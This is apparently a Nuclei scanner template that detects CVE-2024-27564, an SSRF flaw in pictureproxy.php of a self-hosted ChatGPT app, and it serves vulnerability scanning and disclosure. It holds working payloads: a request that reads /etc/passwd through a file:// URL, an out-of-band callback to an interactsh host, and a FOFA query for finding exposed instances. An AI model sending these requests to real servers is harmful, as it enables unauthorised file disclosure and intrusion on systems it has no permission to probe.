41 lines
1.4 KiB
YAML
41 lines
1.4 KiB
YAML
id: CVE-2024-27564
|
|
|
|
info:
|
|
name: ChatGPT个人专用版 - Server Side Request Forgery
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.
|
|
reference:
|
|
- https://github.com/dirk1983/chatgpt/issues/114
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-27564
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: title="ChatGPT个人专用版"
|
|
tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/pictureproxy.php?url=file:///etc/passwd"
|
|
- "{{BaseURL}}/pictureproxy.php?url=http://{{interactsh-url}}"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- status_code == 200
|
|
- contains(header, "image/jpeg")
|
|
- regex('root:.*:0:0:', body)
|
|
condition: and
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- contains(interactsh_protocol, "dns")
|
|
- contains(header, "image/jpeg")
|
|
- status_code == 200
|
|
condition: and
|
|
# digest: 4a0a00473045022100b9b55cd78c5bb4e24de24aca20920e6ba2c0d52798af31282704de45a856095602206312e280926ef5b729c9178e0324d61a55b67c1ab2fb12752b2f46b3ac3dea97:922c64590222798bb761d5b6d8e72950 |